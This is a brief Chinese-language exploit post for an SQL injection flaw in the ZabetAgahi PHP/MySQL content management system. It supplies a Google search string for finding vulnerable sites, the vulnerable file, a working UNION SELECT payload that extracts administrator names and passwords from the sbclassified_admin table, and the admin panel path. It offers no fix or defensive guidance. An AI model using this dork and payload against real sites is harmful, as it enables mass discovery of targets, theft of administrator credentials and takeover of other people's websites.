By:追心
漏洞说明:
ZabetAgahi是一款国外的基于PHP+MYSQL的内容管理系统,ZabetAgahi 由于设计上的缺陷,导致SQL注入漏洞。
漏洞类型:
sql注入、sql盲注、脚本盲注、注入漏洞
谷歌关键词:
inurl:ZabetAgahiCategory.php?cid=
漏洞文件:
ZabetAgahiCategory.php
漏洞测试:
http://www.baidu.com/ZabetAgahiCategory.php?cid=[SQL]
http://www.baidu.com/ZabetAgahiCategory.php?cid=-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--
后台地址:
http://www.baidu.com/AdminZabetAgahi/AdminZabetAgahiHome.php